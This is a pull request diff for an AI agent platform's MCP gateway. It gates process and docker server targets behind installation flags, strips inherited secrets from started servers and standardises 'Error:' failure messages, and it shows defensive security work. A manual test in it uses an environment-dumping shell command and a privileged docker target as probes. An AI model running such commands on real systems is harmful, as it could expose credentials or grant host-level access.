### PR TITLE
Close command execution via MCP targets; make MCP failures and re-reads count

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -32,6 +32,13 @@ fresh empty one, so nothing has to be moved by hand at release time.
   agent definitions keep working). Values in `env` and `headers` are used as
   entered; a `${NAME}` placeholder is refused until users can set their own
   variables — the environment of the server process is never read.
+  `process` and `docker` targets start only where
+  `mindconnect.mcp.allow-process` / `mindconnect.mcp.allow-docker` allow it;
+  unset, both are on while sign-in is off and off once it is on, because
+  registering asks for a login, not an admin role. A started server inherits
+  only `PATH`, `HOME`, locale, proxy and container-daemon variables from the
+  admin UI. Failed MCP calls report `Error: …`, so the chat and a workflow's
+  tool step see them as failures.
   Discovered tools are cached on disk, so a restart does not start every server
   again. Registrations live in `<data>/<namespace>/system/mcp-servers/`, one
   JSON file per server; a Gmail registration ships disabled. The modules sit in
@@ -49,6 +56,11 @@ fresh empty one, so nothing has to be moved by hand at release time.
 - **agents:** `ToolCallScope.rootSessionId`, the chat at the top of a sub-agent
   chain, and `ToolInvoker.call(tool, arguments, scope)`, which the tool-call
   workflow step now calls with the scope found on its run.
+- **agents:** `ToolRegistry.releaseSession(sessionId)` and
+  `MultiToolProvider.releaseSession(sessionId)`: whoever ends a session lets
+  the tools go of what they hold for it. The tool test bench calls it after
+  every test, so testing an MCP tool no longer leaves a connection — or a
+  container — behind per click.
 
 ### Removed
 

--- a/agents/core/mc-agent-tool-spi/src/main/java/ai/mindconnect/agent/tool/MultiToolProvider.java
+++ b/agents/core/mc-agent-tool-spi/src/main/java/ai/mindconnect/agent/tool/MultiToolProvider.java
@@ -1,5 +1,6 @@
 package ai.mindconnect.agent.tool;
 
+import ai.mindconnect.agent.SessionId;
 import ai.mindconnect.agent.tool.AgentTool;
 
 import java.util.Optional;
@@ -84,6 +85,14 @@ public interface MultiToolProvider {
      * {@link #create} will be honored by the registry. Default {@code true}.
      */
     default boolean isAvailable() { return true; }
+
+    /**
+     * Lets go of whatever this provider holds for one session — the MCP
+     * provider's pooled connections and the containers behind them. The
+     * registry forwards {@link ToolRegistry#releaseSession} here. Idempotent;
+     * the default is a no-op for providers that hold nothing per session.
+     */
+    default void releaseSession(SessionId sessionId) {}
 
     /**
      * Build a tool for the given name. Returns {@link Optional#empty()} if

--- a/agents/core/mc-agent-tool-spi/src/main/java/ai/mindconnect/agent/tool/OverlayToolRegistry.java
+++ b/agents/core/mc-agent-tool-spi/src/main/java/ai/mindconnect/agent/tool/OverlayToolRegistry.java
@@ -1,5 +1,7 @@
 package ai.mindconnect.agent.tool;
 
+import ai.mindconnect.agent.SessionId;
+
 import java.util.LinkedHashMap;
 import java.util.LinkedHashSet;
 import java.util.Map;
@@ -104,6 +106,12 @@ public final class OverlayToolRegistry implements ToolRegistry {
     @Override
     public String subgroupOf(String toolName) {
         return delegate.subgroupOf(toolName);
+    }
+
+    /** What a session holds does not depend on what an operator decided. */
+    @Override
+    public void releaseSession(SessionId sessionId) {
+        delegate.releaseSession(sessionId);
     }
 
     /**

--- a/agents/core/mc-agent-tool-spi/src/main/java/ai/mindconnect/agent/tool/SpiToolRegistry.java
+++ b/agents/core/mc-agent-tool-spi/src/main/java/ai/mindconnect/agent/tool/SpiToolRegistry.java
@@ -1,5 +1,6 @@
 package ai.mindconnect.agent.tool;
 
+import ai.mindconnect.agent.SessionId;
 import ai.mindconnect.agent.tool.AgentTool;
 import ai.mindconnect.agent.tool.MultiToolProvider;
 import ai.mindconnect.agent.tool.Tool;
@@ -317,6 +318,23 @@ public class SpiToolRegistry implements ToolRegistry, AutoCloseable {
             }
         }
         return null;   // a ToolFactory tool, or a name nobody serves
+    }
+
+    /**
+     * Every provider lets go of what it holds for the session — ready or not,
+     * since one that dropped out may still hold something. One that fails is
+     * logged and does not keep the others from releasing theirs.
+     */
+    @Override
+    public void releaseSession(SessionId sessionId) {
+        for (MultiToolProvider provider : providers) {
+            try {
+                provider.releaseSession(sessionId);
+            } catch (RuntimeException e) {
+                log.warn("MultiToolProvider {} failed to release session {}: {}",
+                        provider.getClass().getSimpleName(), sessionId, e.toString());
+            }
+        }
     }
 
     @Override

--- a/agents/core/mc-agent-tool-spi/src/main/java/ai/mindconnect/agent/tool/ToolRegistry.java
+++ b/agents/core/mc-agent-tool-spi/src/main/java/ai/mindconnect/agent/tool/ToolRegistry.java
@@ -1,5 +1,6 @@
 package ai.mindconnect.agent.tool;
 
+import ai.mindconnect.agent.SessionId;
 import ai.mindconnect.agent.tool.AgentTool;
 
 import java.util.List;
@@ -60,4 +61,12 @@ public interface ToolRegistry {
      * Catalogs use it to break a large group into readable sections.
      */
     default String subgroupOf(String toolName) { return null; }
+
+    /**
+     * Lets go of whatever the tools hold for one session — a pooled connection,
+     * a started container. Called by whoever ends the session; today that is
+     * the tool test bench, whose sessions last one call. Idempotent, and safe
+     * for a session that never used a tool. Default: nothing is held.
+     */
+    default void releaseSession(SessionId sessionId) { }
 }

--- a/agents/core/mc-agent-tool-spi/src/test/java/ai/mindconnect/agent/tool/OverlayToolRegistryTest.java
+++ b/agents/core/mc-agent-tool-spi/src/test/java/ai/mindconnect/agent/tool/OverlayToolRegistryTest.java
@@ -1,5 +1,6 @@
 package ai.mindconnect.agent.tool;
 
+import ai.mindconnect.agent.SessionId;
 import ai.mindconnect.agent.UserId;
 import org.junit.jupiter.api.Test;
 
@@ -151,12 +152,33 @@ class OverlayToolRegistryTest {
         assertThat(repository.reads).isEqualTo(afterFirst);
     }
 
+    @Test
+    void releasing_a_session_reaches_the_registry_beneath() {
+        // The switch decides what may be resolved, not what a session holds:
+        // a tool switched off after a call still has its connection to let go.
+        FakeRegistry source = new FakeRegistry();
+        OverlayToolRegistry registry = new OverlayToolRegistry(source,
+                new FakeRepository().set("glob", new ToolSettings(false, null, Map.of())));
+        SessionId session = SessionId.random();
+
+        registry.releaseSession(session);
+
+        assertThat(source.released).containsExactly(session);
+    }
+
     private static OverlayToolRegistry overlay(ToolRepository repository) {
         return new OverlayToolRegistry(new FakeRegistry(), repository);
     }
 
     /** Two tools, one per group, with a small schema. */
     private static final class FakeRegistry implements ToolRegistry {
+
+        final List<SessionId> released = new java.util.ArrayList<>();
+
+        @Override
+        public void releaseSession(SessionId sessionId) {
+            released.add(sessionId);
+        }
 
         @Override
         public Optional<Tool> resolve(AgentTool agentTool, ToolCallScope scope) {

--- a/agents/core/mc-agent-tool-spi/src/test/java/ai/mindconnect/agent/tool/SpiToolRegistryReleaseTest.java
+++ b/agents/core/mc-agent-tool-spi/src/test/java/ai/mindconnect/agent/tool/SpiToolRegistryReleaseTest.java
@@ -1,0 +1,44 @@
+package ai.mindconnect.agent.tool;
+
+import ai.mindconnect.agent.SessionId;
+import org.junit.jupiter.api.AfterEach;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+
+import java.util.Optional;
+
+import static org.assertj.core.api.Assertions.assertThat;
+
+/**
+ * Releasing a session is how whoever ends it reaches what the providers hold
+ * for it — the registry is the one object that knows every provider.
+ */
+class SpiToolRegistryReleaseTest {
+
+    private static final ToolEnvironment EMPTY = new ToolEnvironment() {
+        @Override public <T> Optional<T> get(Class<T> type) { return Optional.empty(); }
+        @Override public Optional<String> getString(String key) { return Optional.empty(); }
+    };
+
+    private SpiToolRegistry registry;
+
+    @BeforeEach
+    void setUp() {
+        WarmUpProviders.reset();
+    }
+
+    @AfterEach
+    void tearDown() {
+        if (registry != null) registry.close();
+    }
+
+    @Test
+    void releasing_a_session_reaches_the_providers() {
+        registry = new SpiToolRegistry(EMPTY, getClass().getClassLoader(), new long[0]);
+        SessionId session = SessionId.random();
+
+        registry.releaseSession(session);
+
+        assertThat(WarmUpProviders.fastReleases).containsExactly(session);
+    }
+}

--- a/agents/core/mc-agent-tool-spi/src/test/java/ai/mindconnect/agent/tool/WarmUpProviders.java
+++ b/agents/core/mc-agent-tool-spi/src/test/java/ai/mindconnect/agent/tool/WarmUpProviders.java
@@ -28,6 +28,9 @@ public final class WarmUpProviders {
 
     static final AtomicInteger slowBinds = new AtomicInteger();
     static final AtomicInteger flakyBinds = new AtomicInteger();
+    /** Sessions {@link Fast} was asked to release, in order. */
+    static final java.util.List<ai.mindconnect.agent.SessionId> fastReleases =
+            new java.util.concurrent.CopyOnWriteArrayList<>();
 
     static void reset() {
         slowBindMillis = 300;
@@ -35,6 +38,7 @@ public final class WarmUpProviders {
         throwFromIsAvailable = true;
         slowBinds.set(0);
         flakyBinds.set(0);
+        fastReleases.clear();
     }
 
     /** Ready, but not at once — like an MCP server that has to be spawned. */
@@ -72,6 +76,10 @@ public final class WarmUpProviders {
         @Override public Set<String> toolNames() { return bound ? Set.of("fast_tool") : Set.of(); }
 
         @Override public String group() { return "warmup-fast"; }
+
+        @Override public void releaseSession(ai.mindconnect.agent.SessionId sessionId) {
+            fastReleases.add(sessionId);
+        }
 
         @Override public void bind(ToolEnvironment env) { bound = true; }
 

--- a/agents/doc/manual-tests/mcp/starting-servers-needs-permission.md
+++ b/agents/doc/manual-tests/mcp/starting-servers-needs-permission.md
@@ -1,0 +1,80 @@
+---
+id: mcp-starting-servers-needs-permission
+area: mcp
+requires: [server-9091, server-restartable]
+duration: ~10 min
+last-verified: 2026-09-11 (working tree on e0d19d7, branch fix/mcp-review-1-4, port 9097, probes sent to /mcp-gateway/api/probe instead of through the form)
+---
+
+# Process and docker targets start only where the installation allows them
+
+**Goal:** A `process` or `docker` target runs code with the rights of the admin
+UI, and registering asks for a login, not an admin role. Whether such targets
+start is therefore the installation's decision: `mindconnect.mcp.allow-process`
+and `mindconnect.mcp.allow-docker`, which — unset — are on while sign-in is off
+and off once it is on. An `http` target needs neither. A server that does start
+inherits only what a command needs (`PATH`, `HOME`, locale, proxies, the
+container daemon), never the secrets of the admin UI process.
+
+## Preconditions
+
+- The admin UI can be restarted with extra environment variables
+  (otherwise: SKIPPED).
+
+## Setup
+
+1. Stop the admin UI and start it with both kinds switched off and a test
+   secret in its environment:
+   `MINDCONNECT_MCP_ALLOW_PROCESS=false MINDCONNECT_MCP_ALLOW_DOCKER=false MC_TEST_SECRET=s3cret-from-outside ./agents/server/mc-agent-admin-ui-app/start.sh`
+2. **Expected** in the start log:
+   `MCP servers started on this machine: process targets switched off, docker targets switched off`.
+
+## Steps
+
+1. http://localhost:9091/mcp-gateway → **Register MCP Server**:
+   - **Id**: `envdump`
+   - **Tool name prefix**: `envdump`
+   - **Target (JSON)**:
+     ```json
+     { "type": "process", "command": ["/bin/sh", "-c", "env >&2; exec /bin/cat"], "env": { "MINE": "from-the-registration" } }
+     ```
+   Click **Test connection**.
+   **Expected:** Failure within milliseconds:
+   `process targets are switched off on this installation: a process runs with
+   the rights of this server. An operator allows them with
+   mindconnect.mcp.allow-process=true`. The server log has no `[mcp:/bin/sh]` line.
+2. Replace the target with a container:
+   ```json
+   { "type": "docker", "image": "alpine:3", "runFlags": ["--privileged"], "command": ["env"] }
+   ```
+   Click **Test connection**.
+   **Expected:** `docker targets are switched off on this installation: …
+   mindconnect.mcp.allow-docker=true`; no container was started
+   (`docker ps -a --filter ancestor=alpine:3` shows nothing new).
+3. Replace the target with `{ "type": "http", "url": "https://mcp.deepwiki.com/mcp" }`.
+   Click **Test connection**.
+   **Expected:** Success with DeepWiki's tools — an http target needs no permission.
+4. Stop the admin UI and start it again with the secret but **without** the two
+   flags (sign-in is off locally, so both default to on):
+   `MC_TEST_SECRET=s3cret-from-outside ./agents/server/mc-agent-admin-ui-app/start.sh`
+   **Expected** in the start log: `process targets allowed, docker targets allowed`.
+5. Register the `process` target from step 1 again and click **Test connection**.
+   **Expected:** The probe starts the process and fails on the handshake
+   (`/bin/cat` speaks no MCP). The log lines `[mcp:/bin/sh] …` show `PATH=`,
+   `HOME=` and `MINE=from-the-registration`, and **no** `MC_TEST_SECRET`,
+   `MINDCONNECT_ENCRYPTION_SECRET_KEY` or `MC_POSTGRES_PASSWORD`.
+
+## Cleanup
+
+- http://localhost:9091/mcp-gateway → delete `envdump` if it was saved.
+- Restart the admin UI without `MC_TEST_SECRET`.
+
+## Notes
+
+- With the `keycloak` profile (`mindconnect.auth.enabled=true`) both flags
+  default to off; an installation that wants such servers sets them explicitly.
+- The flags stand in for an admin role on `/mcp-gateway`, which needs a role
+  model the admin UI does not have yet (concept 21 §9.2).
+- Automated twins: `McpStartPolicyTest` (defaults), `McpTargetEndpointsTest`
+  (refusal before anything starts), `McpGatewayAutoConfigurationTest` (a probe
+  with sign-in on), `InheritedEnvironmentTest` (what a started server inherits).

--- a/agents/mcp/mc-agent-tools-mcp/src/main/java/ai/mindconnect/agent/tools/mcp/McpMultiToolProvider.java
+++ b/agents/mcp/mc-agent-tools-mcp/src/main/java/ai/mindconnect/agent/tools/mcp/McpMultiToolProvider.java
@@ -1,10 +1,12 @@
 package ai.mindconnect.agent.tools.mcp;
 
+import ai.mindconnect.agent.SessionId;
 import ai.mindconnect.agent.tool.AgentTool;
 import ai.mindconnect.agent.tool.MultiToolProvider;
 import ai.mindconnect.agent.tool.Tool;
 import ai.mindconnect.agent.tool.ToolCallScope;
 import ai.mindconnect.agent.tool.ToolEnvironment;
+import ai.mindconnect.mcp.gateway.McpCaller;
 import ai.mindconnect.mcp.gateway.McpGateway;
 import ai.mindconnect.mcp.gateway.McpServerId;
 import ai.mindconnect.mcp.gateway.McpServerInfo;
@@ -101,6 +103,15 @@ public final class McpMultiToolProvider implements MultiToolProvider {
                 binding.tool().name(),
                 binding.tool().description(),
                 binding.tool().inputSchema()));
+    }
+
+    /** The gateway's connections for this session, and the containers behind them. */
+    @Override
+    public void releaseSession(SessionId sessionId) {
+        McpGateway current = gateway;
+        if (current != null && sessionId != null) {
+            current.release(new McpCaller(null, sessionId));
+        }
     }
 
     /**

--- a/agents/mcp/mc-agent-tools-mcp/src/main/java/ai/mindconnect/agent/tools/mcp/McpToolAdapter.java
+++ b/agents/mcp/mc-agent-tools-mcp/src/main/java/ai/mindconnect/agent/tools/mcp/McpToolAdapter.java
@@ -23,6 +23,12 @@ import java.util.Map;
  * with no user and no session just to read its description and schema, and
  * a metadata question must not require the means to make a call. The caller
  * identity is assembled when there is actually something to call.
+ *
+ * <p>Every failure comes back as text starting with {@code Error:}. That is
+ * the prefix the tool-call worker, the chat's call history and the workflow
+ * tool step read a failure by; any other wording counts as a result, so the
+ * chat would show the call as successful and a workflow step would carry on
+ * with the complaint as its output.
  */
 final class McpToolAdapter implements Tool {
 
@@ -61,8 +67,12 @@ final class McpToolAdapter implements Tool {
     @Override
     public String execute(Map<String, Object> arguments) {
         if (scope.sessionId() == null) {
-            // Only the catalog resolves without a session, and it never calls.
-            return "Tool execution failed: no session — an MCP tool cannot be called outside an agent session.";
+            // Resolved outside an agent session. The catalog does that and never
+            // calls — but so does a workflow started from the workflow admin or
+            // the REST API, and that one does. Connections are held per session,
+            // so there is nothing to call through.
+            return "Error: " + agentToolName + " needs an agent session — an MCP tool runs in a chat "
+                    + "or in a workflow started from one, not in a run started for nobody in particular.";
         }
         McpCaller caller = new McpCaller(scope.userId(), scope.sessionId());
         try {
@@ -70,7 +80,7 @@ final class McpToolAdapter implements Tool {
             if (result.isError()) {
                 log.warn("{} → {}/{} returned an error: {}",
                         agentToolName, serverId, subToolName, result.asString());
-                return "Error from MCP server: " + result.asString();
+                return "Error: the MCP server reported: " + result.asString();
             }
             String text = result.asString();
             // An MCP server may answer "nothing found" with an empty text
@@ -82,7 +92,7 @@ final class McpToolAdapter implements Tool {
             return text;
         } catch (RuntimeException e) {
             log.error("{} → {}/{} failed", agentToolName, serverId, subToolName, e);
-            return "Tool execution failed: " + e.getMessage();
+            return "Error: " + e.getMessage();
         }
     }
 }

--- a/agents/mcp/mc-agent-tools-mcp/src/test/java/ai/mindconnect/agent/tools/mcp/McpMultiToolProviderTest.java
+++ b/agents/mcp/mc-agent-tools-mcp/src/test/java/ai/mindconnect/agent/tools/mcp/McpMultiToolProviderTest.java
@@ -115,7 +115,9 @@ class McpMultiToolProviderTest {
                 .orElseThrow()
                 .execute(Map.of());
 
-        assertThat(answer).contains("no session");
+        // "Error:" is how the tool-call worker and the workflow step tell a
+        // failure — a workflow started from the admin has no session either.
+        assertThat(answer).startsWith("Error:").contains("agent session");
         assertThat(gateway.calls).isEmpty();
     }
 
@@ -201,7 +203,16 @@ class McpMultiToolProviderTest {
                 .orElseThrow()
                 .execute(Map.of());
 
-        assertThat(answer).contains("Tool execution failed").contains("container did not start");
+        assertThat(answer).startsWith("Error:").contains("container did not start");
+    }
+
+    @Test
+    void releasing_a_session_releases_it_at_the_gateway() {
+        FakeGateway gateway = new FakeGateway().server("gmail", "gmail", "search_emails");
+
+        boundTo(gateway).releaseSession(SCOPE.sessionId());
+
+        assertThat(gateway.released).containsExactly(SCOPE.sessionId());
     }
 
     @Test
@@ -225,7 +236,7 @@ class McpMultiToolProviderTest {
                 .create("gmail_search_emails", AgentTool.of("gmail_search_emails"), SCOPE)
                 .orElseThrow()
                 .execute(Map.of()))
-                .isEqualTo("Error from MCP server: invalid query");
+                .isEqualTo("Error: the MCP server reported: invalid query");
     }
 
     private static McpMultiToolProvider boundTo(McpGateway gateway) {
@@ -279,6 +290,10 @@ class McpMultiToolProviderTest {
             return answer != null ? answer : new McpResult(false, List.of("called " + serverId.value() + "/" + toolName));
         }
 
-        @Override public void release(McpCaller caller) { }
+        final List<SessionId> released = new ArrayList<>();
+
+        @Override public void release(McpCaller caller) {
+            released.add(caller.sessionId());
+        }
     }
 }

--- a/agents/mcp/mc-mcp-gateway-admin-ui-rest/src/main/java/ai/mindconnect/mcp/gateway/admin/ui/McpServerFormView.java
+++ b/agents/mcp/mc-mcp-gateway-admin-ui-rest/src/main/java/ai/mindconnect/mcp/gateway/admin/ui/McpServerFormView.java
@@ -107,6 +107,7 @@ final class McpServerFormView {
                         {"type":"docker","image":"…","mounts":[{"hostPath":"~/x","containerPath":"/x"}],"env":{}}
                         {"type":"process","command":["npx","-y","…"],"env":{}}
                         A remote server needs https unless it runs on this machine.
+                        docker and process start only where this installation allows them.
                         A value in "env" or "headers" is stored and sent as entered. ${NAME} is
                         reserved for variables of the signed-in user, which do not exist yet —
                         a registration that uses one cannot start."""));

--- a/agents/mcp/mc-mcp-gateway-core/src/main/java/ai/mindconnect/mcp/gateway/McpGateway.java
+++ b/agents/mcp/mc-mcp-gateway-core/src/main/java/ai/mindconnect/mcp/gateway/McpGateway.java
@@ -72,9 +72,11 @@ public interface McpGateway {
      * containers. Idempotent, and safe to call for a session that never used
      * a tool.
      *
-     * <p>Nobody calls this yet: the runtime has no "session over" hook
-     * (concept 21, E4). Until it does, implementations must fall back on an
-     * idle timeout, or containers outlive the chats that started them.
+     * <p>Reached through {@code ToolRegistry.releaseSession} — today from the
+     * tool test bench, whose sessions last one call. A chat has no "session
+     * over" hook yet (concept 21, E4); until it does, implementations must
+     * fall back on an idle timeout, or containers outlive the chats that
+     * started them.
      */
     void release(McpCaller caller);
 }

--- a/agents/mcp/mc-mcp-gateway-local/src/main/java/ai/mindconnect/mcp/gateway/local/LocalMcpGateway.java
+++ b/agents/mcp/mc-mcp-gateway-local/src/main/java/ai/mindconnect/mcp/gateway/local/LocalMcpGateway.java
@@ -22,6 +22,7 @@ import java.util.List;
 import java.util.Map;
 import java.util.Optional;
 import java.util.concurrent.ConcurrentHashMap;
+import java.util.concurrent.atomic.AtomicLong;
 
 /**
  * The gateway running in the host's own JVM: registrations from a
@@ -35,9 +36,9 @@ import java.util.concurrent.ConcurrentHashMap;
  * without a restart.
  *
  * <p>A server that cannot be reached costs its own tools and nothing else:
- * discovery failures are logged and remembered as "no tools" for this
- * repository version, so a broken registration neither blocks the catalog
- * nor retries on every keystroke.
+ * discovery failures are logged and remembered as "no tools" until a
+ * registration changes or somebody re-reads that server's tools, so a broken
+ * registration neither blocks the catalog nor retries on every keystroke.
  */
 public final class LocalMcpGateway implements McpGateway, AutoCloseable {
 
@@ -53,17 +54,33 @@ public final class LocalMcpGateway implements McpGateway, AutoCloseable {
     private final Map<McpServerId, List<McpTool>> toolsByServer = new ConcurrentHashMap<>();
     private volatile long cachedAtVersion = Long.MIN_VALUE;
 
+    /**
+     * Moves with every {@link #forget}. Dropping a discovery changes what
+     * {@link #tools} answers without touching a registration, so the
+     * repository's version alone does not show it — and the tool provider
+     * notices a changed catalog by {@link #catalogVersion()} and nothing else.
+     */
+    private final AtomicLong discoveryGeneration = new AtomicLong();
+
     public LocalMcpGateway(McpServerRepository repository,
                            McpProxy proxy,
                            McpSessionRegistry sessions,
                            Path storageDir,
                            Namespace namespace,
-                           String containerRuntime) {
+                           String containerRuntime,
+                           McpStartPolicy startPolicy) {
         this.repository = repository;
         this.proxy = proxy;
         this.sessions = sessions;
         this.discoveryCache = new McpDiscoveryCache(storageDir, namespace);
-        this.endpoints = new McpTargetEndpoints(ContainerBinary.detect(containerRuntime).orElse(null));
+        // Where containers may not start, no container runtime is looked for.
+        String containerBinary = startPolicy.allowDocker()
+                ? ContainerBinary.detect(containerRuntime).orElse(null)
+                : null;
+        this.endpoints = new McpTargetEndpoints(containerBinary, startPolicy);
+        log.info("MCP servers started on this machine: process targets {}, docker targets {}",
+                startPolicy.allowProcess() ? "allowed" : "switched off",
+                startPolicy.allowDocker() ? "allowed" : "switched off");
     }
 
     @Override
@@ -113,20 +130,31 @@ public final class LocalMcpGateway implements McpGateway, AutoCloseable {
         sessions.shutdown();
     }
 
+    /**
+     * The repository's version together with {@link #discoveryGeneration}: a
+     * saved registration moves the first, "Re-read tools" only the second, and
+     * either has to reach the tool names the provider keeps.
+     */
     @Override
     public long catalogVersion() {
-        return repository.version();
+        return 31 * repository.version() + discoveryGeneration.get();
     }
 
     /**
      * Drops what was discovered for one server, in memory and on disk, and
      * closes its pooled connections — they still speak to the old image, URL
-     * or token. Used by the admin side after a registration changed.
+     * or token. Used by the admin side after a registration changed, and by
+     * "Re-read tools".
      */
     void forget(McpServerId server) {
         toolsByServer.remove(server);
         discoveryCache.invalidate(server);
         sessions.closeServer(server.value());
+        // Last: a lookup that read the version before this line sees the new
+        // one next time and rebuilds; one that reads it after this line finds
+        // the discovery already gone. Moved first, a lookup in between would
+        // file the old tools under the new version and keep them.
+        discoveryGeneration.incrementAndGet();
     }
 
     /** What was remembered for this server, without contacting it. */

--- a/agents/mcp/mc-mcp-gateway-local/src/main/java/ai/mindconnect/mcp/gateway/local/McpGatewayAutoConfiguration.java
+++ b/agents/mcp/mc-mcp-gateway-local/src/main/java/ai/mindconnect/mcp/gateway/local/McpGatewayAutoConfiguration.java
@@ -15,6 +15,7 @@ import org.springframework.boot.autoconfigure.condition.ConditionalOnBean;
 import org.springframework.boot.autoconfigure.condition.ConditionalOnMissingBean;
 import org.springframework.boot.autoconfigure.condition.ConditionalOnProperty;
 import org.springframework.context.annotation.Bean;
+import org.springframework.core.env.Environment;
 
 import java.nio.file.Path;
 import java.time.Duration;
@@ -109,11 +110,14 @@ public class McpGatewayAutoConfiguration {
             McpProxy mcpProxy,
             McpSessionRegistry sessions,
             ObjectProvider<Namespace> namespace,
+            Environment environment,
             @Value("${mindconnect.data.base-dir:./data}") String dataBaseDir,
             @Value("${mindconnect.mcp.container-runtime:auto}") String containerRuntime) {
+        // Whether process and docker targets start is the installation's call:
+        // mindconnect.mcp.allow-process / allow-docker, unset following sign-in.
         return new LocalMcpGateway(repository, mcpProxy, sessions,
                 storageRoot(dataBaseDir), namespace.getIfAvailable(() -> Namespace.DEFAULT),
-                containerRuntime);
+                containerRuntime, McpStartPolicy.from(environment));
     }
 
     /**

--- a/agents/mcp/mc-mcp-gateway-local/src/main/java/ai/mindconnect/mcp/gateway/local/McpStartPolicy.java
+++ b/agents/mcp/mc-mcp-gateway-local/src/main/java/ai/mindconnect/mcp/gateway/local/McpStartPolicy.java
@@ -1,0 +1,43 @@
+package ai.mindconnect.mcp.gateway.local;
+
+import org.springframework.core.env.Environment;
+
+/**
+ * Which kinds of MCP server this installation starts on its own machine.
+ *
+ * <p>A {@code process} target runs a command with the rights of this server;
+ * a {@code docker} target runs a container through its container runtime,
+ * which — with a flag like {@code --privileged} or a mount of {@code /} — is
+ * the same thing. Registering asks for a login, not an admin role (concept 21
+ * §9.2 wants one; there is no role model yet), so whoever can sign in could run
+ * anything. Whether these targets start is therefore a decision of the
+ * installation, not of a registration (concept 21 §9.1). An {@code http}
+ * target starts nothing here and needs no permission.
+ *
+ * <p>Unset, both follow sign-in. Without it the installation has one user —
+ * the one at the keyboard, who can run the command in a terminal anyway — and
+ * refusing them protects nobody. With sign-in on, both stay off until an
+ * operator allows them.
+ *
+ * @param allowProcess whether {@code process} targets start
+ * @param allowDocker  whether {@code docker} targets start
+ */
+public record McpStartPolicy(boolean allowProcess, boolean allowDocker) {
+
+    static final String ALLOW_PROCESS = "mindconnect.mcp.allow-process";
+    static final String ALLOW_DOCKER = "mindconnect.mcp.allow-docker";
+    static final String AUTH_ENABLED = "mindconnect.auth.enabled";
+
+    /** Both allowed — a single-user installation, or a test. */
+    public static McpStartPolicy allowAll() {
+        return new McpStartPolicy(true, true);
+    }
+
+    /** The two flags, each defaulting to "on exactly while nobody has to sign in". */
+    public static McpStartPolicy from(Environment environment) {
+        boolean signInOff = !environment.getProperty(AUTH_ENABLED, Boolean.class, false);
+        return new McpStartPolicy(
+                environment.getProperty(ALLOW_PROCESS, Boolean.class, signInOff),
+                environment.getProperty(ALLOW_DOCKER, Boolean.class, signInOff));
+    }
+}

--- a/agents/mcp/mc-mcp-gateway-local/src/main/java/ai/mindconnect/mcp/gateway/local/McpTargetEndpoints.java
+++ b/agents/mcp/mc-mcp-gateway-local/src/main/java/ai/mindconnect/mcp/gateway/local/McpTargetEndpoints.java
@@ -26,17 +26,24 @@ final class McpTargetEndpoints {
 
     /** Container CLI to run {@link McpTarget.Docker} with; null when none was found. */
     private final String containerBinary;
+    /** Which kinds of target this installation starts at all. */
+    private final McpStartPolicy policy;
 
-    McpTargetEndpoints(String containerBinary) {
+    McpTargetEndpoints(String containerBinary, McpStartPolicy policy) {
         this.containerBinary = containerBinary;
+        this.policy = policy;
     }
 
     /**
+     * Every way to a running server passes through here — the probe, discovery
+     * and a call — so this is where a kind of target the installation does not
+     * start is refused.
+     *
      * @throws McpGatewayException when the target cannot be run here at all —
-     *         no container runtime, a mount whose host path is missing, or a
-     *         value that uses a variable. All are configuration problems, and
-     *         all are worth saying out loud rather than letting the server fail
-     *         cryptically.
+     *         a kind of target this installation does not start, no container
+     *         runtime, a mount whose host path is missing, or a value that uses
+     *         a variable. All are configuration problems, and all are worth
+     *         saying out loud rather than letting the server fail cryptically.
      */
     McpEndpoint toEndpoint(McpTarget target) {
         return switch (target) {
@@ -48,6 +55,11 @@ final class McpTargetEndpoints {
     }
 
     private McpStdioSpawn dockerSpawn(McpTarget.Docker docker) {
+        if (!policy.allowDocker()) {
+            throw new McpGatewayException("docker targets are switched off on this installation: a "
+                    + "container runs with the rights of this server's container runtime. An operator "
+                    + "allows them with " + McpStartPolicy.ALLOW_DOCKER + "=true");
+        }
         if (containerBinary == null) {
             throw new McpGatewayException(
                     "no container runtime available for image '" + docker.image() + "'");
@@ -74,6 +86,11 @@ final class McpTargetEndpoints {
     }
 
     private McpStdioSpawn processSpawn(McpTarget.Process process) {
+        if (!policy.allowProcess()) {
+            throw new McpGatewayException("process targets are switched off on this installation: a "
+                    + "process runs with the rights of this server. An operator allows them with "
+                    + McpStartPolicy.ALLOW_PROCESS + "=true");
+        }
         String executable = process.command().get(0);
         return new McpStdioSpawn(
                 executable,

--- a/agents/mcp/mc-mcp-gateway-local/src/test/java/ai/mindconnect/mcp/gateway/local/LocalMcpGatewayForgetTest.java
+++ b/agents/mcp/mc-mcp-gateway-local/src/test/java/ai/mindconnect/mcp/gateway/local/LocalMcpGatewayForgetTest.java
@@ -52,7 +52,24 @@ class LocalMcpGatewayForgetTest {
     }
 
     private LocalMcpGateway gateway(InMemoryRepository repository) {
-        return new LocalMcpGateway(repository, proxy, sessions, storage, Namespace.DEFAULT, "nothing-here");
+        return new LocalMcpGateway(repository, proxy, sessions, storage, Namespace.DEFAULT, "nothing-here",
+                McpStartPolicy.allowAll());
+    }
+
+    @Test
+    void forgetting_a_server_moves_the_catalog_version_although_no_registration_changed() {
+        // "Re-read tools" writes no file. The tool provider notices a changed
+        // catalog by this number alone, so without it agents kept the old
+        // tools — or none, when the server had been down at the first lookup.
+        InMemoryRepository repository = new InMemoryRepository().with(GMAIL, true);
+        LocalMcpGateway gateway = gateway(repository);
+        long repositoryVersion = repository.version();
+        long before = gateway.catalogVersion();
+
+        gateway.forget(GMAIL);
+
+        assertThat(repository.version()).as("no registration changed").isEqualTo(repositoryVersion);
+        assertThat(gateway.catalogVersion()).isNotEqualTo(before);
     }
 
     @Test

--- a/agents/mcp/mc-mcp-gateway-local/src/test/java/ai/mindconnect/mcp/gateway/local/McpGatewayAutoConfigurationTest.java
+++ b/agents/mcp/mc-mcp-gateway-local/src/test/java/ai/mindconnect/mcp/gateway/local/McpGatewayAutoConfigurationTest.java
@@ -2,10 +2,13 @@ package ai.mindconnect.mcp.gateway.local;
 
 import ai.mindconnect.mcp.gateway.McpCaller;
 import ai.mindconnect.mcp.gateway.McpGateway;
+import ai.mindconnect.mcp.gateway.McpProbeResult;
 import ai.mindconnect.mcp.gateway.McpRegistryAdmin;
 import ai.mindconnect.mcp.gateway.McpResult;
 import ai.mindconnect.mcp.gateway.McpServerId;
 import ai.mindconnect.mcp.gateway.McpServerInfo;
+import ai.mindconnect.mcp.gateway.McpServerRegistration;
+import ai.mindconnect.mcp.gateway.McpTarget;
 import ai.mindconnect.mcp.gateway.McpTool;
 import org.junit.jupiter.api.io.TempDir;
